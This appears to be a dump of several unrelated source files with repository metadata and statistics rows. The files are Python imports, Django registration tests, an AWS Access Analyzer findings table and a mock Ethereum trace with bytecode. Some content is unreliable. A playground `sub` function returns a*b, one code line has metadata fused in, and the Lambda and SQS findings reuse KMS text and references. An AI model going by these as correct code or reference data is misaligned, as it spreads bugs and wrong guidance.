| 15.380952 | 38 | 0.405573 | 70 | 323 | 1.871429 | 0.2 | 0.244275 | 0.229008 | 0.122137 | 0.916031 | 0.916031 | 0.916031 | 0.916031 | 0.916031 | 0.916031 | 0 | 0.031128 | 0.204334 | 323 | 20 | 39 | 16.15 | 0.478599 | 0 | 0 | 0.875 | 0 | 0.25 | 0.904025 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | null | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 13 |
956835eda2d95416bd44725febb9c4b266773591 | 133 | py | Python | treebankanalytics/readers/__init__.py | Cocophotos/TreebankAnalytics | cf45e24cecb0b187a9b6ec5a55a836c7ab5ffb01 | [
"MIT"
] | 2 | 2015-10-28T21:12:36.000Z | 2016-09-08T14:00:41.000Z | treebankanalytics/readers/__init__.py | Cocophotos/TreebankAnalytics | cf45e24cecb0b187a9b6ec5a55a836c7ab5ffb01 | [
"MIT"
] | null | null | null | treebankanalytics/readers/__init__.py | Cocophotos/TreebankAnalytics | cf45e24cecb0b187a9b6ec5a55a836c7ab5ffb01 | [
"MIT"
] | null | null | null | from treebankanalytics.readers import sagae
from treebankanalytics.readers import sdp
from treebankanalytics.readers import sequoia
| 26.6 | 45 | 0.879699 | 15 | 133 | 7.8 | 0.466667 | 0.538462 | 0.717949 | 0.871795 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.097744 | 133 | 4 | 46 | 33.25 | 0.975 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
95f1254d7bb01a9757ce9a07660db28e0f09cfec | 122 | py | Python | spielwiese/calculon/__init__.py | stephrdev/loetwerk | 06516706b7b981cf8638474c1ad89e32ed3924e1 | [
"MIT"
] | 1 | 2019-06-13T16:18:45.000Z | 2019-06-13T16:18:45.000Z | spielwiese/calculon/__init__.py | stephrdev/loetwerk | 06516706b7b981cf8638474c1ad89e32ed3924e1 | [
"MIT"
] | null | null | null | spielwiese/calculon/__init__.py | stephrdev/loetwerk | 06516706b7b981cf8638474c1ad89e32ed3924e1 | [
"MIT"
] | null | null | null | def add(a, b):
return a+b
def sub(a, b):
    """Intentionally incorrect subtraction used as a failing-test fixture."""
    return a*b  # expected to fail: deliberately returns the product, not a - b
def op(f, a, b):
    """Apply the binary callable `f` to (a, b) and return the result.

    Fix: the original return line had dataset-extraction residue fused onto
    it (`return f(a,b) | 15.25 | 32 | ...`), which parses as a chain of
    bitwise-or operations and fails at runtime; restore the plain call.
    """
    return f(a, b)
c26820b05cea852ab983daa2e9176aa3e7dbc2c8 | 107 | py | Python | src/lib/utils/__init__.py | alphagov/github-team-membership-concourse-resource | 845f55ec82d5830181900cce3b3cfacbc2f9d175 | [
"MIT"
] | null | null | null | src/lib/utils/__init__.py | alphagov/github-team-membership-concourse-resource | 845f55ec82d5830181900cce3b3cfacbc2f9d175 | [
"MIT"
] | null | null | null | src/lib/utils/__init__.py | alphagov/github-team-membership-concourse-resource | 845f55ec82d5830181900cce3b3cfacbc2f9d175 | [
"MIT"
] | null | null | null | from .util import call_github_api, eprint, get_hash_of_members, members_hash_from_version, validate_source
| 53.5 | 106 | 0.878505 | 17 | 107 | 5 | 0.823529 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.074766 | 107 | 1 | 107 | 107 | 0.858586 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | 7 |
6c85391946bc5f9d0167f8e5cbe44107416e9f66 | 13,661 | py | Python | tests/api/test_register.py | gcbirzan/django-rest-registration | 1a9da937c283d03d1fce1a68322a702e14692c79 | [
"MIT"
] | 1 | 2018-11-14T18:25:01.000Z | 2018-11-14T18:25:01.000Z | tests/api/test_register.py | gcbirzan/django-rest-registration | 1a9da937c283d03d1fce1a68322a702e14692c79 | [
"MIT"
] | null | null | null | tests/api/test_register.py | gcbirzan/django-rest-registration | 1a9da937c283d03d1fce1a68322a702e14692c79 | [
"MIT"
] | 1 | 2021-05-24T15:49:58.000Z | 2021-05-24T15:49:58.000Z | import math
import time
from unittest.mock import patch
from django.test.utils import override_settings
from rest_framework import status
from rest_registration.api.views.register import RegisterSigner
from rest_registration.settings import registration_settings
from .base import APIViewTestCase
# Shared fixtures for the register-view tests below.
REGISTER_VERIFICATION_URL = '/verify-account/'
VERIFICATION_FROM_EMAIL = 'no-reply@example.com'

# Settings override: e-mail verification enabled with the default serializer.
REST_REGISTRATION_WITH_VERIFICATION = {
    'REGISTER_VERIFICATION_ENABLED': True,
    'REGISTER_VERIFICATION_URL': REGISTER_VERIFICATION_URL,
    'VERIFICATION_FROM_EMAIL': VERIFICATION_FROM_EMAIL,
}

# Same as above, but the serializer drops the password-confirmation field.
REST_REGISTRATION_WITH_VERIFICATION_NO_PASSWORD = {
    'REGISTER_VERIFICATION_ENABLED': True,
    'REGISTER_VERIFICATION_URL': REGISTER_VERIFICATION_URL,
    'VERIFICATION_FROM_EMAIL': VERIFICATION_FROM_EMAIL,
    'REGISTER_SERIALIZER_PASSWORD_CONFIRM': False,
}

# Verification disabled entirely.
REST_REGISTRATION_WITHOUT_VERIFICATION = {
    'REGISTER_VERIFICATION_ENABLED': False,
}

# Verification enabled with an HTML e-mail body template.
REST_REGISTRATION_WITH_HTML_EMAIL_VERIFICATION = {
    'REGISTER_VERIFICATION_ENABLED': True,
    'REGISTER_VERIFICATION_URL': REGISTER_VERIFICATION_URL,
    'REGISTER_VERIFICATION_EMAIL_TEMPLATES': {
        'subject': 'rest_registration/register/subject.txt',
        'html_body': 'rest_registration/register/body.html',
    },
    'VERIFICATION_FROM_EMAIL': VERIFICATION_FROM_EMAIL,
}
@override_settings(REST_REGISTRATION=REST_REGISTRATION_WITH_VERIFICATION)
class RegisterViewTestCase(APIViewTestCase):
    """Tests for the register endpoint with e-mail verification enabled."""
    # Resolved by APIViewTestCase to the view under test.
    VIEW_NAME = 'register'
def test_register_serializer_ok(self):
    """The default register serializer exposes exactly the expected fields."""
    serializer = registration_settings.REGISTER_SERIALIZER_CLASS(data={})
    expected_fields = {
        'id', 'username', 'first_name', 'last_name',
        'email', 'password', 'password_confirm',
    }
    self.assertEqual(set(serializer.get_fields()), expected_fields)
@override_settings(
    REST_REGISTRATION=REST_REGISTRATION_WITH_VERIFICATION_NO_PASSWORD,
)
def test_register_serializer_no_password_ok(self):
    """Without password confirmation the serializer omits `password_confirm`."""
    serializer = registration_settings.REGISTER_SERIALIZER_CLASS(data={})
    expected_fields = {
        'id', 'username', 'first_name', 'last_name', 'email', 'password',
    }
    self.assertEqual(set(serializer.get_fields()), expected_fields)
def test_register_ok(self):
data = self._get_register_user_data(password='testpassword')
request = self.create_post_request(data)
time_before = math.floor(time.time())
with self.assert_one_mail_sent() as sent_emails:
response = self.view_func(request)
time_after = math.ceil(time.time())
self.assert_valid_response(response, status.HTTP_201_CREATED)
user_id = response.data['id']
# Check database state.
user = self.user_class.objects.get(id=user_id)
self.assertEqual(user.username, data['username'])
self.assertTrue(user.check_password(data['password']))
self.assertFalse(user.is_active)
# Check verification e-mail.
sent_email = sent_emails[0]
self.assertEqual(sent_email.from_email, VERIFICATION_FROM_EMAIL)
self.assertListEqual(sent_email.to, [data['email']])
url = self.assert_one_url_line_in_text(sent_email.body)
verification_data = self.assert_valid_verification_url(
url,
expected_path=REGISTER_VERIFICATION_URL,
expected_query_keys={'signature', 'user_id', 'timestamp'},
)
url_user_id = int(verification_data['user_id'])
self.assertEqual(url_user_id, user_id)
url_sig_timestamp = int(verification_data['timestamp'])
self.assertGreaterEqual(url_sig_timestamp, time_before)
self.assertLessEqual(url_sig_timestamp, time_after)
signer = RegisterSigner(verification_data)
signer.verify()
# TODO: unskip this test when × entity problem will be fixed.
@override_settings(
REST_REGISTRATION=REST_REGISTRATION_WITH_HTML_EMAIL_VERIFICATION,
)
def test_register_with_html_email_ok(self):
data = self._get_register_user_data(password='testpassword')
request = self.create_post_request(data)
time_before = math.floor(time.time())
with self.assert_one_mail_sent() as sent_emails:
response = self.view_func(request)
time_after = math.ceil(time.time())
self.assert_valid_response(response, status.HTTP_201_CREATED)
user_id = response.data['id']
# Check database state.
user = self.user_class.objects.get(id=user_id)
self.assertEqual(user.username, data['username'])
self.assertTrue(user.check_password(data['password']))
self.assertFalse(user.is_active)
# Check verification e-mail.
sent_email = sent_emails[0]
self.assertEqual(sent_email.from_email, VERIFICATION_FROM_EMAIL)
self.assertListEqual(sent_email.to, [data['email']])
url = self.assert_one_url_in_brackets_in_text(sent_email.body)
verification_data = self.assert_valid_verification_url(
url,
expected_path=REGISTER_VERIFICATION_URL,
expected_query_keys={'signature', 'user_id', 'timestamp'},
)
url_user_id = int(verification_data['user_id'])
self.assertEqual(url_user_id, user_id)
url_sig_timestamp = int(verification_data['timestamp'])
self.assertGreaterEqual(url_sig_timestamp, time_before)
self.assertLessEqual(url_sig_timestamp, time_after)
signer = RegisterSigner(verification_data)
signer.verify()
@override_settings(
REST_REGISTRATION=REST_REGISTRATION_WITH_VERIFICATION_NO_PASSWORD,
)
def test_register_no_password_confirm_ok(self):
data = self._get_register_user_data(password='testpassword')
data.pop('password_confirm')
request = self.create_post_request(data)
time_before = math.floor(time.time())
with self.assert_one_mail_sent() as sent_emails:
response = self.view_func(request)
self.assert_valid_response(response, status.HTTP_201_CREATED)
time_after = math.ceil(time.time())
user_id = response.data['id']
# Check database state.
user = self.user_class.objects.get(id=user_id)
self.assertEqual(user.username, data['username'])
self.assertTrue(user.check_password(data['password']))
self.assertFalse(user.is_active)
# Check verification e-mail.
sent_email = sent_emails[0]
self.assertEqual(sent_email.from_email, VERIFICATION_FROM_EMAIL)
self.assertListEqual(sent_email.to, [data['email']])
url = self.assert_one_url_line_in_text(sent_email.body)
verification_data = self.assert_valid_verification_url(
url,
expected_path=REGISTER_VERIFICATION_URL,
expected_query_keys={'signature', 'user_id', 'timestamp'},
)
url_user_id = int(verification_data['user_id'])
self.assertEqual(url_user_id, user_id)
url_sig_timestamp = int(verification_data['timestamp'])
self.assertGreaterEqual(url_sig_timestamp, time_before)
self.assertLessEqual(url_sig_timestamp, time_after)
signer = RegisterSigner(verification_data)
signer.verify()
def test_register_same_username(self):
self.create_test_user(username='testusername')
data = self._get_register_user_data(
username='testusername', password='testpassword')
request = self.create_post_request(data)
with self.assert_no_mail_sent():
response = self.view_func(request)
self.assert_invalid_response(response, status.HTTP_400_BAD_REQUEST)
@override_settings(
REST_REGISTRATION=REST_REGISTRATION_WITHOUT_VERIFICATION,
)
def test_register_without_verification_ok(self):
data = self._get_register_user_data(password='testpassword')
request = self.create_post_request(data)
with self.assert_no_mail_sent():
response = self.view_func(request)
self.assert_valid_response(response, status.HTTP_201_CREATED)
user_id = response.data['id']
user = self.user_class.objects.get(id=user_id)
self.assertEqual(user.username, data['username'])
self.assertTrue(user.check_password(data['password']))
self.assertTrue(user.is_active)
def test_register_missing_email(self):
data = self._get_register_user_data(password='testpassword')
del data['email']
request = self.create_post_request(data)
with self.assert_no_mail_sent():
response = self.view_func(request)
self.assert_invalid_response(response, status.HTTP_400_BAD_REQUEST)
def test_register_empty_email(self):
data = self._get_register_user_data(password='testpassword', email='')
request = self.create_post_request(data)
with self.assert_no_mail_sent():
response = self.view_func(request)
self.assert_response_is_bad_request(response)
def test_register_short_password(self):
data = self._get_register_user_data(password='a')
request = self.create_post_request(data)
with self.assert_no_mail_sent():
response = self.view_func(request)
self.assert_response_is_bad_request(response)
def test_register_password_numeric(self):
data = self._get_register_user_data(password='4321332211113322')
request = self.create_post_request(data)
with self.assert_no_mail_sent():
response = self.view_func(request)
self.assert_response_is_bad_request(response)
def test_register_password_same_as_username(self):
username = 'testusername'
data = self._get_register_user_data(
username=username, password=username)
request = self.create_post_request(data)
with self.assert_no_mail_sent():
response = self.view_func(request)
self.assert_response_is_bad_request(response)
def test_register_not_matching_password(self):
data = self._get_register_user_data(
password='testpassword1',
password_confirm='testpassword2')
request = self.create_post_request(data)
with self.assert_no_mail_sent():
response = self.view_func(request)
self.assert_response_is_bad_request(response)
def _get_register_user_data(
self, password, password_confirm=None, **options):
username = 'testusername'
email = 'testusername@example.com'
if password_confirm is None:
password_confirm = password
data = {
'username': username,
'password': password,
'password_confirm': password_confirm,
'email': email,
}
data.update(options)
return data
class VerifyRegistrationViewTestCase(APIViewTestCase):
VIEW_NAME = 'verify-registration'
@override_settings(REST_REGISTRATION=REST_REGISTRATION_WITH_VERIFICATION)
def test_verify_ok(self):
user = self.create_test_user(is_active=False)
self.assertFalse(user.is_active)
signer = RegisterSigner({'user_id': user.pk})
data = signer.get_signed_data()
request = self.create_post_request(data)
response = self.view_func(request)
self.assert_valid_response(response, status.HTTP_200_OK)
user.refresh_from_db()
self.assertTrue(user.is_active)
@override_settings(REST_REGISTRATION=REST_REGISTRATION_WITH_VERIFICATION)
def test_verify_tampered_timestamp(self):
user = self.create_test_user(is_active=False)
self.assertFalse(user.is_active)
signer = RegisterSigner({'user_id': user.pk})
data = signer.get_signed_data()
data['timestamp'] += 1
request = self.create_post_request(data)
response = self.view_func(request)
self.assert_invalid_response(response, status.HTTP_400_BAD_REQUEST)
user.refresh_from_db()
self.assertFalse(user.is_active)
@override_settings(REST_REGISTRATION=REST_REGISTRATION_WITH_VERIFICATION)
def test_verify_expired(self):
timestamp = int(time.time())
user = self.create_test_user(is_active=False)
self.assertFalse(user.is_active)
with patch('time.time',
side_effect=lambda: timestamp):
signer = RegisterSigner({'user_id': user.pk})
data = signer.get_signed_data()
request = self.create_post_request(data)
with patch('time.time',
side_effect=lambda: timestamp + 3600 * 24 * 8):
response = self.view_func(request)
self.assert_invalid_response(response, status.HTTP_400_BAD_REQUEST)
user.refresh_from_db()
self.assertFalse(user.is_active)
@override_settings(
REST_REGISTRATION={
'REGISTER_VERIFICATION_ENABLED': False,
'REGISTER_VERIFICATION_URL': REGISTER_VERIFICATION_URL,
}
)
def test_verify_disabled(self):
user = self.create_test_user(is_active=False)
self.assertFalse(user.is_active)
signer = RegisterSigner({'user_id': user.pk})
data = signer.get_signed_data()
request = self.create_post_request(data)
response = self.view_func(request)
self.assert_invalid_response(response, status.HTTP_404_NOT_FOUND)
user.refresh_from_db()
self.assertFalse(user.is_active)
| 42.033846 | 79 | 0.695044 | 1,576 | 13,661 | 5.649112 | 0.102157 | 0.035943 | 0.021566 | 0.035381 | 0.824329 | 0.816129 | 0.787712 | 0.781871 | 0.760867 | 0.733011 | 0 | 0.005491 | 0.213528 | 13,661 | 324 | 80 | 42.16358 | 0.823157 | 0.015445 | 0 | 0.679577 | 0 | 0 | 0.086445 | 0.036081 | 0 | 0 | 0 | 0.003086 | 0.242958 | 1 | 0.06338 | false | 0.119718 | 0.028169 | 0 | 0.109155 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 7 |
dd02975fd672ab82b6392179c3a15280c35b0d94 | 7,909 | py | Python | al_aws_access_analyzer_collector/content/aws_access_analyzer_findings.py | alertlogic/al-aws-access-analyzer-collector | fbb0763a18489efa786083b88defde6bd652ebf1 | [
"MIT"
] | 1 | 2020-01-29T22:55:29.000Z | 2020-01-29T22:55:29.000Z | al_aws_access_analyzer_collector/content/aws_access_analyzer_findings.py | alertlogic/al-aws-access-analyzer-collector | fbb0763a18489efa786083b88defde6bd652ebf1 | [
"MIT"
] | 3 | 2021-04-26T15:01:24.000Z | 2021-11-09T22:05:58.000Z | al_aws_access_analyzer_collector/content/aws_access_analyzer_findings.py | alertlogic/al-aws-access-analyzer-collector | fbb0763a18489efa786083b88defde6bd652ebf1 | [
"MIT"
] | 1 | 2021-08-09T05:06:26.000Z | 2021-08-09T05:06:26.000Z |
VULNERABILITIES = {
"citadel-001": {
"id": "iam-access-analyzer-001",
"name": "IAM Access Analyzer IAM Finding",
"description": "For each instance of a resource that is shared outside of an account, Access Analyzer generates a finding. Findings include information about the access and the external principal that it is granted to. An IAM Access Analyzer IAM finding has been discovered in your account.",
"remediation": "Review the IAM Access Analyzer findings for this account.",
"resolution": "IAM Access Analyzer findings stay Active until they are archived, or the offending sharing policy is removed from the account. Review the findings for IAM roles and either archive the finding or remove the offending share policy.",
"risk": "High",
"scope": "deployment",
"ccss_score": 7.6,
"resolution_type": "enable configuration",
"reference": "https://docs.aws.amazon.com/IAM/latest/UserGuide/best-practices.html",
"pci_concern": "PCI DSS 3.2.1: Requirement 10: Track and monitor all access to network resources and cardholder data",
"ccss_vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C/PL:R/EM:A",
"categories": ["IAM Access Analyzer", "security"],
"last_modified": "2021-05-07"
},
"citadel-002": {
"id": "iam-access-analyzer-002",
"name": "IAM Access Analyzer S3 Bucket Finding",
"description": "When Access Analyzer analyzes Amazon S3 buckets, it generates a finding when an Amazon S3 bucket policy, ACL, or access point applied to a bucket grants access to an external entity. An IAM Access Analyzer S3 Bucket finding has been discovered in your account.",
"remediation": "Review the IAM Access Analyzer findings for this account.",
"resolution": "IAM Access Analyzer findings stay Active until they are archived, or the offending sharing policy is removed from the account. Review the findings for S3 Buckets and either archive the finding or remove the offending share policy.",
"risk": "High",
"scope": "deployment",
"ccss_score": 7.6,
"resolution_type": "enable configuration",
"reference": "https://docs.aws.amazon.com/AmazonS3/latest/user-guide/set-permissions.html",
"pci_concern": "PCI DSS 3.2.1: Requirement 10: Track and monitor all access to network resources and cardholder data",
"ccss_vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C/PL:R/EM:A",
"categories": ["IAM Access Analyzer", "security"],
"last_modified": "2021-05-07"
},
"citadel-003": {
"id": "iam-access-analyzer-003",
"name": "IAM Access Analyzer KMS Finding",
"description": "For AWS KMS customer master keys (CMKs), Access Analyzer analyzes the key policies and grants applied to a key. Access Analyzer generates a finding if a key policy or grant allows an external entity to access the key. If the key policy doesn't allow the Access Analyzer role to read the key metadata, an Access Denied error finding is generated. An IAM Access Analyzer KMS finding has been discovered in your account.",
"remediation": "Review the IAM Access Analyzer findings for this account.",
"resolution": "IAM Access Analyzer findings stay Active until they are archived, or the offending sharing policy is removed from the account. Review the findings for KMS and either archive the finding or remove the offending share policy.",
"risk": "High",
"scope": "deployment",
"ccss_score": 7.6,
"resolution_type": "enable configuration",
"reference": "https://docs.aws.amazon.com/kms/latest/developerguide/control-access.html",
"pci_concern": "PCI DSS 3.2.1: Requirement 10: Track and monitor all access to network resources and cardholder data",
"ccss_vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C/PL:R/EM:A",
"categories": ["IAM Access Analyzer", "security"],
"last_modified": "2021-05-07"
},
"citadel-004": {
"id": "iam-access-analyzer-004",
"name": "IAM Access Analyzer Full Administrative Access IAM Role Finding",
"description": "For each instance of a resource that is shared outside of an account, Access Analyzer generates a finding. Findings include information about the access and the external principal that it is granted to. An IAM Access Analyzer IAM finding with Full Administrative Access has been discovered in your account.",
"remediation": "Review the IAM Access Analyzer findings for this account.",
"resolution": "IAM Access Analyzer findings stay Active until they are archived, or the offending sharing policy is removed from the account. Review the findings for IAM Roles and either archive the finding or remove the offending share policy.",
"risk": "High",
"scope": "deployment",
"ccss_score": 10.0,
"resolution_type": "enable configuration",
"reference": "https://docs.aws.amazon.com/IAM/latest/UserGuide/best-practices.html",
"pci_concern": "PCI DSS 3.2.1: Requirement 10: Track and monitor all access to network resources and cardholder data",
"ccss_vector": "AV:N/AC:L/Au:N\C:C/I:C/A:C/PL:A/EM:A",
"categories": ["IAM Access Analyzer", "security"],
"last_modified": "2021-05-07"
},
"citadel-005": {
"id": "iam-access-analyzer-005",
"name": "IAM Access Analyzer Lambda Finding",
"description": "For AWS Lambda functions, Access Analyzer analyzes policies, including condition statements in a policy, that grant access to the function to an external entity. Access Analyzer also analyzes permissions granted when using the AddPermission operation of the AWS Lambda API with an EventSourceToken. An IAM Access Analyzer Lambda finding has been discovered in your account.",
"remediation": "Review the IAM Access Analyzer findings for this account.",
"resolution": "IAM Access Analyzer findings stay Active until they are archived, or the offending sharing policy is removed from the account. Review the findings for KMS and either archive the finding or remove the offending share policy.",
"risk": "High",
"scope": "deployment",
"ccss_score": 7.6,
"resolution_type": "enable configuration",
"reference": "https://docs.aws.amazon.com/kms/latest/developerguide/control-access.html",
"pci_concern": "PCI DSS 3.2.1: Requirement 10: Track and monitor all access to network resources and cardholder data",
"ccss_vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C/PL:R/EM:A",
"categories": ["IAM Access Analyzer", "security"],
"last_modified": "2021-05-07"
},
"citadel-006": {
"id": "iam-access-analyzer-006",
"name": "IAM Access Analyzer SQS Finding",
"description": "For Amazon SQS queues, Access Analyzer analyzes policies, including condition statements in a policy, that allow an external entity access to a queue. An IAM Access Analyzer SQS finding has been discovered in your account.",
"remediation": "Review the IAM Access Analyzer findings for this account.",
"resolution": "IAM Access Analyzer findings stay Active until they are archived, or the offending sharing policy is removed from the account. Review the findings for KMS and either archive the finding or remove the offending share policy.",
"risk": "High",
"scope": "deployment",
"ccss_score": 7.6,
"resolution_type": "enable configuration",
"reference": "https://docs.aws.amazon.com/kms/latest/developerguide/control-access.html",
"pci_concern": "PCI DSS 3.2.1: Requirement 10: Track and monitor all access to network resources and cardholder data",
"ccss_vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C/PL:R/EM:A",
"categories": ["IAM Access Analyzer", "security"],
"last_modified": "2021-05-07"
}
}
| 79.09 | 443 | 0.691111 | 1,109 | 7,909 | 4.901713 | 0.158702 | 0.115894 | 0.112583 | 0.055188 | 0.815489 | 0.779065 | 0.76858 | 0.76858 | 0.76858 | 0.766556 | 0 | 0.021091 | 0.20268 | 7,909 | 99 | 444 | 79.888889 | 0.840945 | 0 | 0 | 0.612245 | 0 | 0.306122 | 0.810572 | 0.044765 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
dd66f4611ee27310698d92ab437bfbe6f00e11f1 | 41 | py | Python | OpenCart/Drivers/__init__.py | turovod/Otus | 57433c6944bca155177b07ff361139ff30f7f692 | [
"MIT"
] | null | null | null | OpenCart/Drivers/__init__.py | turovod/Otus | 57433c6944bca155177b07ff361139ff30f7f692 | [
"MIT"
] | null | null | null | OpenCart/Drivers/__init__.py | turovod/Otus | 57433c6944bca155177b07ff361139ff30f7f692 | [
"MIT"
] | null | null | null | from .get_driver import get_driver_path
| 13.666667 | 39 | 0.853659 | 7 | 41 | 4.571429 | 0.714286 | 0.5625 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.121951 | 41 | 2 | 40 | 20.5 | 0.888889 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
06e150573d7f6738dbb129da042da8c00b19be98 | 92,731 | py | Python | gnosis/eth/tests/mocks/mock_trace_filter.py | titandac/gnosis-py | cf0af4f25e64b22256eabb415d0f3fe3a6180b14 | [
"MIT"
] | 64 | 2018-09-26T19:56:50.000Z | 2022-03-18T21:45:59.000Z | gnosis/eth/tests/mocks/mock_trace_filter.py | zhanghao-ic/gnosis-py | d2a5912547b7d1b576c826909f4c1d0155db536f | [
"MIT"
] | 151 | 2018-09-10T21:42:05.000Z | 2022-03-31T12:33:31.000Z | gnosis/eth/tests/mocks/mock_trace_filter.py | zhanghao-ic/gnosis-py | d2a5912547b7d1b576c826909f4c1d0155db536f | [
"MIT"
] | 50 | 2018-12-13T20:43:46.000Z | 2022-03-30T09:32:32.000Z | from hexbytes import HexBytes
trace_filter_mock_1 = [
{
"action": {
"from": "0x4e59b44847b379578588920cA78FbF26c0B4956C",
"gas": 4619079,
"value": 0,
"init": HexBytes(
"0x608060405234801561001057600080fd5b5060016004819055506159ae80620000296000396000f3fe6080604052600436106101dc5760003560e01c8063affed0e011610102578063e19a9dd911610095578063f08a032311610064578063f08a032314611647578063f698da2514611698578063f8dc5dd9146116c3578063ffa1ad741461173e57610231565b8063e19a9dd91461139b578063e318b52b146113ec578063e75235b81461147d578063e86637db146114a857610231565b8063cc2f8452116100d1578063cc2f8452146110e8578063d4d9bdcd146111b5578063d8d11f78146111f0578063e009cfde1461132a57610231565b8063affed0e014610d94578063b4faba0914610dbf578063b63e800d14610ea7578063c4ca3a9c1461101757610231565b80635624b25b1161017a5780636a761202116101495780636a761202146109945780637d83297414610b50578063934f3a1114610bbf578063a0e67e2b14610d2857610231565b80635624b25b146107fb5780635ae6bd37146108b9578063610b592514610908578063694e80c31461095957610231565b80632f54bf6e116101b65780632f54bf6e146104d35780633408e4701461053a578063468721a7146105655780635229073f1461067a57610231565b80630d582f131461029e57806312fb68e0146102f95780632d9ad53d1461046c57610231565b36610231573373ffffffffffffffffffffffffffffffffffffffff167f3d0ce9bfc3ed7d6862dbb28b2dea94561fe714a1b4d019aa8af39730d1ad7c3d346040518082815260200191505060405180910390a2005b34801561023d57600080fd5b5060007f6c9a6c4a39284e37ed1cf53d337577d14212a4870fb976a4366c693b939918d560001b905080548061027257600080f35b36600080373360601b365260008060143601600080855af13d6000803e80610299573d6000fd5b3d6000f35b3480156102aa57600080fd5b506102f7600480360360408110156102c157600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190803590602001909291905050506117ce565b005b34801561030557600080fd5b5061046a6004803603608081101561031c57600080fd5b81019080803590602001909291908035906020019064010000000081111561034357600080fd5b82018360208201111561035557600080fd5b8035906020019184600183028401116401000000008311171561037757600080fd5b91908080601f016020809104026020016040519081016040528093929190818152602001838380828437600081840152601f19601f820116905080830192505050505050509
192919290803590602001906401000000008111156103da57600080fd5b8201836020820111156103ec57600080fd5b8035906020019184600183028401116401000000008311171561040e57600080fd5b91908080601f016020809104026020016040519081016040528093929190818152602001838380828437600081840152601f19601f82011690508083019250505050505050919291929080359060200190929190505050611bbe565b005b34801561047857600080fd5b506104bb6004803603602081101561048f57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190505050612440565b60405180821515815260200191505060405180910390f35b3480156104df57600080fd5b50610522600480360360208110156104f657600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190505050612512565b60405180821515815260200191505060405180910390f35b34801561054657600080fd5b5061054f6125e4565b6040518082815260200191505060405180910390f35b34801561057157600080fd5b506106626004803603608081101561058857600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff16906020019092919080359060200190929190803590602001906401000000008111156105cf57600080fd5b8201836020820111156105e157600080fd5b8035906020019184600183028401116401000000008311171561060357600080fd5b91908080601f016020809104026020016040519081016040528093929190818152602001838380828437600081840152601f19601f820116905080830192505050505050509192919290803560ff1690602001909291905050506125f1565b60405180821515815260200191505060405180910390f35b34801561068657600080fd5b506107776004803603608081101561069d57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff16906020019092919080359060200190929190803590602001906401000000008111156106e457600080fd5b8201836020820111156106f657600080fd5b8035906020019184600183028401116401000000008311171561071857600080fd5b91908080601f016020809104026020016040519081016040528093929190818152602001838380828437600081840152601f19601f820116905080830192505050505050509192919290803560ff1690602001909291905050506127d7565b60405180831515815260200180602001828103825283818151815260200191508051906020019080838360005b8
